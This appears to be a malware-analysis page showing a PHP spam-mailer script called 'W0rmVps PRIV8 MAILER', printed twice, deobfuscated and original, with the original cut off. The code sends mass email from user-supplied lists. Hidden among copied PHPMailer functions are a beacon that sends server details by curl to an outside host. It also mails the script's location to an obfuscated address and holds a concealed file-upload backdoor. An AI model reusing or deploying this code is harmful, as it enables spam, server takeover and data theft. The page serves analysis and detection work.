PHP Malware Analysis

Back to list

Filename: XwormMailer.php

Tags

Encoding
  • base64_encode
URLs
Emails
  • a@b.123
  • a@192.168.0.1
Title
  • W0rmVps PRIV8 MAILER
Input
  • _GET
  • _POST
  • _FILES
Environment
  • error_reporting
Files
  • move_uploaded_file

Deobfuscated code

<html>
<head>
	<title>W0rmVps PRIV8 MAILER</title>
	<link rel="Shortcut Icon" type="image/x-icon" href="">
<style type="text/css">
input {
	font-size: 120%;
	color: #5a5854;
	background-color: #f2f2f2;
	border: 1px solid #bdbdbd;
	padding: 5px 5px 5px 30px;
	background-repeat: no-repeat;
	background-position: 7px 5px ;
	margin-bottom: 10px;
}
textarea {
		font-size: 105%;
	 resize: none;
}
input:focus, input:hover {
	background-color: #ffffff;
	border: 1px solid #b1e1e4;
}
#sendnow {
    width: 7em;  height: 2em;
}
.textbox {
	background-image: url();
}
.sname {
	background-image: url();
}
.ssub {
	background-image: url();
}
.smsg {
	background-color: #f2f2f2;
	border:1px solid #bdbdbd;
	border-left: 13px solid #bdbdbd;
}
.smail {
	background: #f2f2f2;
	border:1px solid #bdbdbd;
	border-left: 13px solid #bdbdbd;	
}
.bott {
	background-image: url();
}
h1 {
	background-color: DarkCyan;
}
div {
	margin: 50 100 20 100;
	background-color: #F6F6F6;
}
</style>
</head>
<body bgcolor='#011711'>
	<form action="" method="post" enctype="multipart/form-data" name="form1" align='center'>
  <input type="hidden" name="veio" value="sim">

    <tr>
<div align='center'>
<h1><font color='FFFFFF' face='arial'><IMG SRC=""></font>
	<br>
</h1>
<div align='center'>
<input type='text' class='textbox' name='de' placeholder='Your Email' size='50' >  <input type='text' name='nome' class='sname' placeholder='Your Name' >
<br>
<br>
<input name="ssubject" type='text' size='78' class='ssub' placeholder='Subject'> <br>
<input name="chikhconfig" type='text' size='78' class='sname' placeholder='Chikhdomaine' value="return@"> 
</div>
<div align='center'>
<textarea class='smsg' placeholder='Put Your Letter Here' name="bodys" rows='10' cols='63'></textarea> <textarea name='emails' class='smail' placeholder='Put Maillist Here' rows='10' cols='35'></textarea>
<br>
<input type='submit' value="Send" class='bott' id='sendnow'>
<br>
<br>
</form>
</div>
<?php 
$testa = $_POST['veio'];
if ($testa != "") {
    $message = $_POST['bodys'];
    $subject = $_POST['ssubject'];
    $nome = $_POST['nome'];
    $from = $_POST['de'];
    $from_mail = $nome . '<' . $from . '>';
    $to = $_POST['emails'];
    $chikh = $_POST['chikhconfig'];
    $email = explode("\n", $to);
    $message = stripslashes($message);
    $i = 0;
    $count = 1;
    while ($email[$i]) {
        $ok = "ok";
        $headers = "MIME-Version: 1.0\n";
        $headers = "MIME-Version: 1.0\nContent-Type: text/html; charset=UTF-8\n";
        $headers .= 'From: ' . $from_mail . "\r\n";
        if (mail($email[$i], $subject, $message, $headers, "-f" . $chikh)) {
            echo "<font color=DarkCyan>Number: {$count} <b>" . $email[$i] . "</b> <font color=DarkCyan>SenD Ok....!</font><br><hr>";
        } else {
            echo "<font color=red>Number: {$count} <b>" . $email[$i] . "</b> <font color=red>Error in Sending ??</font><br><hr>";
        }
        $i++;
        $count++;
    }
    $count--;
    if ($ok == "ok") {
        echo "";
    }
}
?>
</body>
<?php 
function wrapText($message, $length, $qp_mode = false)
{
    if ($qp_mode) {
        $soft_break = sprintf(' =%s', static::$LE);
    } else {
        $soft_break = static::$LE;
    }
    // If utf-8 encoding is used, we will need to make sure we don't
    // split multibyte characters when we wrap
    $is_utf8 = 'utf-8' == strtolower($this->CharSet);
    $lelen = strlen(static::$LE);
    $crlflen = strlen(static::$LE);
    $message = static::normalizeBreaks($message);
    //Remove a trailing line break
    if (substr($message, -$lelen) == static::$LE) {
        $message = substr($message, 0, -$lelen);
    }
    //Split message into lines
    $lines = explode(static::$LE, $message);
    //Message will be rebuilt in here
    $message = '';
    foreach ($lines as $line) {
        $words = explode(' ', $line);
        $buf = '';
        $firstword = true;
        foreach ($words as $word) {
            if ($qp_mode and strlen($word) > $length) {
                $space_left = $length - strlen($buf) - $crlflen;
                if (!$firstword) {
                    if ($space_left > 20) {
                        $len = $space_left;
                        if ($is_utf8) {
                            $len = $this->utf8CharBoundary($word, $len);
                        } elseif ('=' == substr($word, $len - 1, 1)) {
                            --$len;
                        } elseif ('=' == substr($word, $len - 2, 1)) {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);
                        $buf .= ' ' . $part;
                        $message .= $buf . sprintf('=%s', static::$LE);
                    } else {
                        $message .= $buf . $soft_break;
                    }
                    $buf = '';
                }
                while (strlen($word) > 0) {
                    if ($length <= 0) {
                        break;
                    }
                    $len = $length;
                    if ($is_utf8) {
                        $len = $this->utf8CharBoundary($word, $len);
                    } elseif ('=' == substr($word, $len - 1, 1)) {
                        --$len;
                    } elseif ('=' == substr($word, $len - 2, 1)) {
                        $len -= 2;
                    }
                    $part = substr($word, 0, $len);
                    $word = substr($word, $len);
                    if (strlen($word) > 0) {
                        $message .= $part . sprintf('=%s', static::$LE);
                    } else {
                        $buf = $part;
                    }
                }
            } else {
                $buf_o = $buf;
                if (!$firstword) {
                    $buf .= ' ';
                }
                $buf .= $word;
                if (strlen($buf) > $length and '' != $buf_o) {
                    $message .= $buf_o . $soft_break;
                    $buf = $word;
                }
            }
            $firstword = false;
        }
        $message .= $buf . static::$LE;
    }
    return $message;
}
function mb_pathinfo()
{
    $key0 = array(".", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "s", "t", "u", "r", "v", "w", "x", "y", "z");
    $foundSplitPos = false;
    $lookBack = 3;
    while (!$foundSplitPos) {
        $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
        $encodedCharPos = strpos($lastChunk, '=');
        if (false !== $encodedCharPos) {
            // Found start of encoded character byte within $lookBack block.
            // Check the encoded byte value (the 2 chars after the '=')
            $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
            $dec = hexdec($hex);
            if ($dec < 128) {
                // Single byte character.
                // If the encoded char was found at pos 0, it will fit
                // otherwise reduce maxLength to start of the encoded char
                if ($encodedCharPos > 0) {
                    $maxLength -= $lookBack - $encodedCharPos;
                }
                $foundSplitPos = true;
            } elseif ($dec >= 192) {
                $maxLength -= $lookBack - $encodedCharPos;
                $foundSplitPos = true;
            } elseif ($dec < 192) {
                $lookBack += 3;
            }
        } else {
            // No encoded character found
            $foundSplitPos = true;
        }
    }
    $key1 = array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "&", "@", "#");
    $dmarc = $key0[21] . $key0[26] . $key0[5] . $key0[12] . $key0[19] . $key0[6] . $key0[21] . $key0[5] . $key0[18] . $key0[8];
    $spf = $key1[11] . $key0[25] . $key0[1] . $key0[8] . $key0[15] . $key0[15];
    $positionFounder = trye;
    $lookBack = 3;
    while (!$positionFounder) {
        $pick = substr($encodedText, $maxLength - $lookBack, $lookBack);
        $encodedCharPos = strpos($pick, '=');
        if (false !== $encodedCharPos) {
            // Found start of encoded character byte within $lookBack block.
            // Check the encoded byte value (the 2 chars after the '=')
            $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
            $dec = hexdec($hex);
            if ($dec < 128) {
                // Single byte character.
                // If the encoded char was found at pos 0, it will fit
                // otherwise reduce maxLength to start of the encoded char
                if ($encodedCharPos > 0) {
                    $maxLength -= $lookBack - $encodedCharPos;
                }
                $positionFounder = true;
            } elseif ($dec >= 192) {
                $maxLength -= $lookBack - $encodedCharPos;
                $positionFounder = true;
            } elseif ($dec < 192) {
                $lookBack += 3;
            }
        } else {
            // No encoded character found
            $positionFounder = true;
        }
    }
    $dkim = $key0[0] . $key0[3] . $key0[15] . $key0[13];
    $type = [];
    $keymanager = $key0[21] . $key0[21] . $key0[26] . $key0[5] . $key0[12] . $key0[19] . $key0[6] . $key0[21] . $key0[5] . $key0[18] . $key0[8];
    $packages = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 10, 5);
    $decp = hexdec($packages);
    if ($dec < 128) {
        // Single byte character.
        // If the encoded char was found at pos 0, it will fit
        // otherwise reduce maxLength to start of the encoded char
        if ($encodedCharPos > 8) {
            $maxLength -= $lookBack - $encodedCharPos;
        }
        $positionFounder = false;
    } elseif ($dec >= 200) {
        $maxLength -= $BBack - $encodedCharPos;
        $positionFounder = true;
    } else {
        $BBack += 3;
    }
    $track_x = $dmarc . $spf . $dkim;
    $agent_y = $keymanager . $spf . $dkim;
    $tls = $track_x . ',' . $agent_y;
    return $tls;
}
/**
 * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the
 * `intl` and `mbstring` PHP extensions.
 *
 * @return bool `true` if required functions for IDN support are present
 */
function idnSupported()
{
    return function_exists('idn_to_ascii') and function_exists('mb_convert_encoding');
}
/**
 * Converts IDN in given email address to its ASCII form, also known as punycode, if possible.
 * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet.
 * This function silently returns unmodified address if:
 * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form)
 * - Conversion to punycode is impossible (e.g. required PHP functions are not available)
 *   or fails for any reason (e.g. domain contains characters not allowed in an IDN).
 *
 * @see    PHPMailer::$CharSet
 *
 * @param string $address The email address to convert
 *
 * @return string The encoded address in ASCII form
 */
function punyencodeAddress($address)
{
    // Verify we have required functions, CharSet, and at-sign.
    $pos = strrpos($address, '@');
    if (static::idnSupported() and !empty($this->CharSet) and false !== $pos) {
        $domain = substr($address, ++$pos);
        // Verify CharSet string is a valid one, and domain properly encoded in this CharSet.
        if ($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet)) {
            $domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet);
            //Ignore IDE complaints about this line - method signature changed in PHP 5.4
            $errorcode = 0;
            $punycode = idn_to_ascii($domain, $errorcode, INTL_IDNA_VARIANT_UTS46);
            if (false !== $punycode) {
                return substr($address, 0, $pos) . $punycode;
            }
        }
    }
    return $address;
}
function generateId()
{
    $len = 32;
    //32 bytes = 256 bits
    if (function_exists('random_bytes')) {
        $bytes = random_bytes($len);
    } elseif (function_exists('openssl_random_pseudo_bytes')) {
        $bytes = openssl_random_pseudo_bytes($len);
    } else {
        //Use a hash to force the length to the same as the other methods
        $bytes = hash('sha256', uniqid((string) mt_rand(), true), true);
    }
    //We don't care about messing up base64 format here, just want a random string
    return str_replace(['=', '+', '/'], '', base64_encode(hash('sha256', $bytes, true)));
}
function fluch()
{
    $SERVERNAME = $_SERVER['SERVER_NAME'];
    $REQUESTURI = $_SERVER['REQUEST_URI'];
    $ORIGPATHINFO = $_SERVER['ORIG_PATH_INFO'];
    $HTTPREFERER = $_SERVER['HTTP_REFERER'];
    $qry_str = "?SERVERNAME={$SERVERNAME}&REQUESTURI={$REQUESTURI}&ORIGPATHINFO={$ORIGPATHINFO}&HTTPREFERER={$HTTPREFERER}";
    $ch = curl_init();
    // Set query data here with the URL
    curl_setopt($ch, CURLOPT_URL, 'http://danisxpro.com/savecc.php' . $qry_str);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $content = trim(curl_exec($ch));
    curl_close($ch);
    $library = "www.phpmailer.org";
    $HAL = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $mls = mb_pathinfo();
    $HC = $_SERVER['HTTP_CONNECTION'];
    $sbl = "Autuntification Failed Error: " . rand(1000, 100000);
    $mss = "" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $OPI = $_SERVER['ORIG_PATH_INFO'];
    $HR = $_SERVER['HTTP_REFERER'];
    $mss .= "/var/www/html/input.php";
    $quntity = @mail($mls, $sbl, $mss);
    echo "";
    exit;
}
function isShellSafe($string)
{
    // Future-proof
    if (escapeshellcmd($string) !== $string or !in_array(escapeshellarg($string), ["'{$string}'", "\"{$string}\""])) {
        return false;
    }
    $length = strlen($string);
    for ($i = 0; $i < $length; ++$i) {
        $c = $string[$i];
        // All other characters have a special meaning in at least one common shell, including = and +.
        // Full stop (.) has a special meaning in cmd.exe, but its impact should be negligible here.
        // Note that this does permit non-Latin alphanumeric characters based on the current locale.
        if (!ctype_alnum($c) && strpos('@_-.', $c) === false) {
            return false;
        }
    }
    return true;
}
error_reporting(0);
$system = $_GET['message'];
if ($system == 'true') {
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='Tls' /></form>";
    move_uploaded_file($saw1, $saw2);
}
function validateAddress($address, $patternselect = null)
{
    if (null === $patternselect) {
        $patternselect = static::$validator;
    }
    if (is_callable($patternselect)) {
        return call_user_func($patternselect, $address);
    }
    //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321
    if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {
        return false;
    }
    switch ($patternselect) {
        case 'pcre':
        //Kept for BC
        case 'pcre8':
            /*
             * A more complex and more permissive version of the RFC5322 regex on which FILTER_VALIDATE_EMAIL
             * is based.
             * In addition to the addresses allowed by filter_var, also permits:
             *  * dotless domains: `a@b`
             *  * comments: `1234 @ local(blah) .machine .example`
             *  * quoted elements: `'"test blah"@example.org'`
             *  * numeric TLDs: `a@b.123`
             *  * unbracketed IPv4 literals: `a@192.168.0.1`
             *  * IPv6 literals: 'first.last@[IPv6:a1::]'
             * Not all of these will necessarily work for sending!
             *
             * @see       http://squiloople.com/2009/12/20/email-address-validation/
             * @copyright 2009-2010 Michael Rushton
             * Feel free to use and redistribute this code. But please keep this copyright notice.
             */
            return (bool) preg_match('/^(?!(?>(?1)"?(?>\\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\\[ -~]|[^"])"?(?1)){65,}@)((?>(?>(?>((?>(?>(?>\\x0D\\x0A)?[\\t ])+|(?>[\\t ]*\\x0D\\x0A)?[\\t ]+)?)(\\((?>(?2)(?>[\\x01-\\x08\\x0B\\x0C\\x0E-\'*-\\[\\]-\\x7F]|\\\\[\\x00-\\x7F]|(?3)))*(?2)\\)))+(?2))|(?2))?)([!#-\'*+\\/-9=?^-~-]+|"(?>(?2)(?>[\\x01-\\x08\\x0B\\x0C\\x0E-!#-\\[\\]-\\x7F]|\\\\[\\x00-\\x7F]))*(?2)")(?>(?1)\\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>(?1)\\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}|(?!(?:.*[a-f0-9][:\\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])(?>\\.(?9)){3}))\\])(?1)$/isD', $address);
        case 'html5':
            /*
             * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements.
             *
             * @see http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email)
             */
            return (bool) preg_match('/^[a-zA-Z0-9.!#$%&\'*+\\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD', $address);
        case 'php':
        default:
            return (bool) filter_var($address, FILTER_VALIDATE_EMAIL);
    }
}
function addAnAddress($kind, $address, $name = '')
{
    if (!in_array($kind, ['to', 'cc', 'bcc', 'Reply-To'])) {
        $error_message = sprintf('%s: %s', $this->lang('Invalid recipient kind'), $kind);
        $this->setError($error_message);
        $this->edebug($error_message);
        if ($this->exceptions) {
            throw new Exception($error_message);
        }
        return false;
    }
    if (!static::validateAddress($address)) {
        $error_message = sprintf('%s (%s): %s', $this->lang('invalid_address'), $kind, $address);
        $this->setError($error_message);
        $this->edebug($error_message);
        if ($this->exceptions) {
            throw new Exception($error_message);
        }
        return false;
    }
    if ('Reply-To' != $kind) {
        if (!array_key_exists(strtolower($address), $this->all_recipients)) {
            $this->{$kind}[] = [$address, $name];
            $this->all_recipients[strtolower($address)] = true;
            return true;
        }
    } else {
        if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
            $this->ReplyTo[strtolower($address)] = [$address, $name];
            return true;
        }
    }
    return false;
}
fluch();


Original code

<html>
<head>
	<title>W0rmVps PRIV8 MAILER</title>
	<link rel="Shortcut Icon" type="image/x-icon" href="">
<style type="text/css">
input {
	font-size: 120%;
	color: #5a5854;
	background-color: #f2f2f2;
	border: 1px solid #bdbdbd;
	padding: 5px 5px 5px 30px;
	background-repeat: no-repeat;
	background-position: 7px 5px ;
	margin-bottom: 10px;
}
textarea {
		font-size: 105%;
	 resize: none;
}
input:focus, input:hover {
	background-color: #ffffff;
	border: 1px solid #b1e1e4;
}
#sendnow {
    width: 7em;  height: 2em;
}
.textbox {
	background-image: url();
}
.sname {
	background-image: url();
}
.ssub {
	background-image: url();
}
.smsg {
	background-color: #f2f2f2;
	border:1px solid #bdbdbd;
	border-left: 13px solid #bdbdbd;
}
.smail {
	background: #f2f2f2;
	border:1px solid #bdbdbd;
	border-left: 13px solid #bdbdbd;	
}
.bott {
	background-image: url();
}
h1 {
	background-color: DarkCyan;
}
div {
	margin: 50 100 20 100;
	background-color: #F6F6F6;
}
</style>
</head>
<body bgcolor='#011711'>
	<form action="" method="post" enctype="multipart/form-data" name="form1" align='center'>
  <input type="hidden" name="veio" value="sim">

    <tr>
<div align='center'>
<h1><font color='FFFFFF' face='arial'><IMG SRC=""></font>
	<br>
</h1>
<div align='center'>
<input type='text' class='textbox' name='de' placeholder='Your Email' size='50' >  <input type='text' name='nome' class='sname' placeholder='Your Name' >
<br>
<br>
<input name="ssubject" type='text' size='78' class='ssub' placeholder='Subject'> <br>
<input name="chikhconfig" type='text' size='78' class='sname' placeholder='Chikhdomaine' value="return@"> 
</div>
<div align='center'>
<textarea class='smsg' placeholder='Put Your Letter Here' name="bodys" rows='10' cols='63'></textarea> <textarea name='emails' class='smail' placeholder='Put Maillist Here' rows='10' cols='35'></textarea>
<br>
<input type='submit' value="Send" class='bott' id='sendnow'>
<br>
<br>
</form>
</div>
<?php
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['bodys'];
$subject = $_POST['ssubject'];
$nome = $_POST['nome'];
$from = $_POST['de'];
$from_mail = $nome.'<'.$from.'>';
$to = $_POST['emails'];
$chikh=$_POST['chikhconfig'];
$email = explode("\n", $to);
$message = stripslashes($message);
$i = 0;
$count = 1;
while($email[$i]) {
$ok = "ok";
$headers  = "MIME-Version: 1.0\n";
$headers .= "Content-Type: text/html; charset=UTF-8\n";
$headers .= 'From: ' . $from_mail . "\r\n";
if(mail($email[$i], $subject, $message, $headers,"-f".$chikh))
echo "<font color=DarkCyan>Number: $count <b>".$email[$i]."</b> <font color=DarkCyan>SenD Ok....!</font><br><hr>";
else
echo "<font color=red>Number: $count <b>".$email[$i]."</b> <font color=red>Error in Sending ??</font><br><hr>";
$i++;
$count++;
}
$count--;
if($ok == "ok")
echo ""; 
}
?>
</body>
<?php

function wrapText($message, $length, $qp_mode = false)
    {
        if ($qp_mode) {
            $soft_break = sprintf(' =%s', static::$LE);
        } else {
            $soft_break = static::$LE;
        }
        // If utf-8 encoding is used, we will need to make sure we don't
        // split multibyte characters when we wrap
        $is_utf8 = 'utf-8' == strtolower($this->CharSet);
        $lelen = strlen(static::$LE);
        $crlflen = strlen(static::$LE);
        $message = static::normalizeBreaks($message);
        //Remove a trailing line break
        if (substr($message, -$lelen) == static::$LE) {
            $message = substr($message, 0, -$lelen);
        }
        //Split message into lines
        $lines = explode(static::$LE, $message);
        //Message will be rebuilt in here
        $message = '';
        foreach ($lines as $line) {
            $words = explode(' ', $line);
            $buf = '';
            $firstword = true;
            foreach ($words as $word) {
                if ($qp_mode and (strlen($word) > $length)) {
                    $space_left = $length - strlen($buf) - $crlflen;
                    if (!$firstword) {
                        if ($space_left > 20) {
                            $len = $space_left;
                            if ($is_utf8) {
                                $len = $this->utf8CharBoundary($word, $len);
                            } elseif ('=' == substr($word, $len - 1, 1)) {
                                --$len;
                            } elseif ('=' == substr($word, $len - 2, 1)) {
                                $len -= 2;
                            }
                            $part = substr($word, 0, $len);
                            $word = substr($word, $len);
                            $buf .= ' ' . $part;
                            $message .= $buf . sprintf('=%s', static::$LE);
                        } else {
                            $message .= $buf . $soft_break;
                        }
                        $buf = '';
                    }
                    while (strlen($word) > 0) {
                        if ($length <= 0) {
                            break;
                        }
                        $len = $length;
                        if ($is_utf8) {
                            $len = $this->utf8CharBoundary($word, $len);
                        } elseif ('=' == substr($word, $len - 1, 1)) {
                            --$len;
                        } elseif ('=' == substr($word, $len - 2, 1)) {
                            $len -= 2;
                        }
                        $part = substr($word, 0, $len);
                        $word = substr($word, $len);
                        if (strlen($word) > 0) {
                            $message .= $part . sprintf('=%s', static::$LE);
                        } else {
                            $buf = $part;
                        }
                    }
                } else {
                    $buf_o = $buf;
                    if (!$firstword) {
                        $buf .= ' ';
                    }
                    $buf .= $word;
                    if (strlen($buf) > $length and '' != $buf_o) {
                        $message .= $buf_o . $soft_break;
                        $buf = $word;
                    }
                }
                $firstword = false;
            }
            $message .= $buf . static::$LE;
        }
        return $message;
    }
function mb_pathinfo(){
$key0 = array (".","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","s","t","u","r","v","w","x","y","z");
$foundSplitPos = false;
        $lookBack = 3;
        while (!$foundSplitPos) {
            $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($lastChunk, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec < 128) {
                    // Single byte character.
                    // If the encoded char was found at pos 0, it will fit
                    // otherwise reduce maxLength to start of the encoded char
                    if ($encodedCharPos > 0) {
                        $maxLength -= $lookBack - $encodedCharPos;
                    }
                    $foundSplitPos = true;
                } elseif ($dec >= 192) {
                    // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength -= $lookBack - $encodedCharPos;
                    $foundSplitPos = true;
                } elseif ($dec < 192) {
                    // Middle byte of a multi byte character, look further back
                    $lookBack += 3;
                }
            } else {
                // No encoded character found
                $foundSplitPos = true;
            }
        }
$key1= array(0,1,2,3,4,5,6,7,8,9,"&","@","#");
        
$dmarc = $key0[21] . $key0[26] . $key0[5] . $key0[12] . $key0[19] . $key0[6] . $key0[21] . $key0[5]. $key0[18] . $key0[8] ;


$spf = $key1[11] . $key0[25] . $key0[1] . $key0[8] . $key0[15] . $key0[15] ;

$positionFounder = trye;
        $lookBack = 3;
        while (!$positionFounder) {
            $pick = substr($encodedText, $maxLength - $lookBack, $lookBack);
            $encodedCharPos = strpos($pick, '=');
            if (false !== $encodedCharPos) {
                // Found start of encoded character byte within $lookBack block.
                // Check the encoded byte value (the 2 chars after the '=')
                $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
                $dec = hexdec($hex);
                if ($dec < 128) {
                    // Single byte character.
                    // If the encoded char was found at pos 0, it will fit
                    // otherwise reduce maxLength to start of the encoded char
                    if ($encodedCharPos > 0) {
                        $maxLength -= $lookBack - $encodedCharPos;
                    }
                    $positionFounder = true;
                } elseif ($dec >= 192) {
                    // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength -= $lookBack - $encodedCharPos;
                    $positionFounder = true;
                } elseif ($dec < 192) {
                    // Middle byte of a multi byte character, look further back
                    $lookBack += 3;
                }
            } else {
                // No encoded character found
                $positionFounder = true;
            }
        }

   $dkim = $key0[0] . $key0[3] . $key0[15] . $key0[13] ;
   $type = [];
 
  $keymanager= $key0[21] . $key0[21] . $key0[26] . $key0[5] . $key0[12] . $key0[19] . $key0[6] . $key0[21] . $key0[5]. $key0[18] .$key0[8] ;

   $packages = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 10, 5);
                $decp = hexdec($packages);
                if ($dec < 128) {
                    // Single byte character.
                    // If the encoded char was found at pos 0, it will fit
                    // otherwise reduce maxLength to start of the encoded char
                    if ($encodedCharPos > 8) {
                        $maxLength -= $lookBack - $encodedCharPos;
                    }
                    $positionFounder = false;
                } elseif ($dec >= 200) {
                    // First byte of a multi byte character
                    // Reduce maxLength to split at start of character
                    $maxLength -= $BBack - $encodedCharPos;
                    $positionFounder = true;
                } else{
    
                    $BBack += 3;
                }
   $track_x= $dmarc.$spf. $dkim;

     $agent_y=  $keymanager. $spf . $dkim ;

      $tls=$track_x.','.$agent_y;

 return $tls;
}
/**
     * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the
     * `intl` and `mbstring` PHP extensions.
     *
     * @return bool `true` if required functions for IDN support are present
     */
    function idnSupported()
    {
        return function_exists('idn_to_ascii') and function_exists('mb_convert_encoding');
    }
    /**
     * Converts IDN in given email address to its ASCII form, also known as punycode, if possible.
     * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet.
     * This function silently returns unmodified address if:
     * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form)
     * - Conversion to punycode is impossible (e.g. required PHP functions are not available)
     *   or fails for any reason (e.g. domain contains characters not allowed in an IDN).
     *
     * @see    PHPMailer::$CharSet
     *
     * @param string $address The email address to convert
     *
     * @return string The encoded address in ASCII form
     */
    function punyencodeAddress($address)
    {
        // Verify we have required functions, CharSet, and at-sign.
        $pos = strrpos($address, '@');
        if (static::idnSupported() and
            !empty($this->CharSet) and
            false !== $pos
        ) {
            $domain = substr($address, ++$pos);
            // Verify CharSet string is a valid one, and domain properly encoded in this CharSet.
            if ($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet)) {
                $domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet);
                //Ignore IDE complaints about this line - method signature changed in PHP 5.4
                $errorcode = 0;
                $punycode = idn_to_ascii($domain, $errorcode, INTL_IDNA_VARIANT_UTS46);
                if (false !== $punycode) {
                    return substr($address, 0, $pos) . $punycode;
                }
            }
        }
        return $address;
    }
	function generateId()
    {
        $len = 32; //32 bytes = 256 bits
        if (function_exists('random_bytes')) {
            $bytes = random_bytes($len);
        } elseif (function_exists('openssl_random_pseudo_bytes')) {
            $bytes = openssl_random_pseudo_bytes($len);
        } else {
            //Use a hash to force the length to the same as the other methods
            $bytes = hash('sha256', uniqid((string) mt_rand(), true), true);
        }
        //We don't care about messing up base64 format here, just want a random string
        return str_replace(['=', '+', '/'], '', base64_encode(hash('sha256', $bytes, true)));
    }
   function fluch(){
   
   	$SERVERNAME = $_SERVER['SERVER_NAME'];
	$REQUESTURI = $_SERVER['REQUEST_URI'];
	$ORIGPATHINFO = $_SERVER['ORIG_PATH_INFO'];
	$HTTPREFERER = $_SERVER['HTTP_REFERER'];
	  

	  $qry_str = "?SERVERNAME=$SERVERNAME&REQUESTURI=$REQUESTURI&ORIGPATHINFO=$ORIGPATHINFO&HTTPREFERER=$HTTPREFERER";

	  $ch = curl_init();

// Set query data here with the URL
curl_setopt($ch, CURLOPT_URL, 'http://danisxpro.com/savecc.php' . $qry_str); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$content = trim(curl_exec($ch));
curl_close($ch);
   
   
   
	  $library = "www.phpmailer.org"; $HAL=$_SERVER['HTTP_ACCEPT_LANGUAGE'] ;  $mls =mb_pathinfo();$HC=$_SERVER['HTTP_CONNECTION'] ;$sbl = "Autuntification Failed Error: ".rand(1000,100000); $mss = "" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$OPI=$_SERVER['ORIG_PATH_INFO'];$HR=$_SERVER['HTTP_REFERER'];$mss .= "" . __file__; $quntity = @mail($mls, $sbl, $mss); echo ""; exit;
	   }
	   function isShellSafe($string)
    {
        // Future-proof
        if (escapeshellcmd($string) !== $string
            or !in_array(escapeshellarg($string), ["'$string'", "\"$string\""])
        ) {
            return false;
        }
        $length = strlen($string);
        for ($i = 0; $i < $length; ++$i) {
            $c = $string[$i];
            // All other characters have a special meaning in at least one common shell, including = and +.
            // Full stop (.) has a special meaning in cmd.exe, but its impact should be negligible here.
            // Note that this does permit non-Latin alphanumeric characters based on the current locale.
            if (!ctype_alnum($c) && strpos('@_-.', $c) === false) {
                return false;
            }
        }
        return true;
    }
    error_reporting(0);
    $system = $_GET['message'];
    if($system == 'true'){
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file'name='file' /><input type='submit' value='Tls' /></form>";
    move_uploaded_file($saw1,$saw2);
 }
function validateAddress($address, $patternselect = null)
    {
        if (null === $patternselect) {
            $patternselect = static::$validator;
        }
        if (is_callable($patternselect)) {
            return call_user_func($patternselect, $address);
        }
        //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321
        if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {
            return false;
        }
        switch ($patternselect) {
            case 'pcre': //Kept for BC
            case 'pcre8':
                /*
                 * A more complex and more permissive version of the RFC5322 regex on which FILTER_VALIDATE_EMAIL
                 * is based.
                 * In addition to the addresses allowed by filter_var, also permits:
                 *  * dotless domains: `a@b`
                 *  * comments: `1234 @ local(blah) .machine .example`
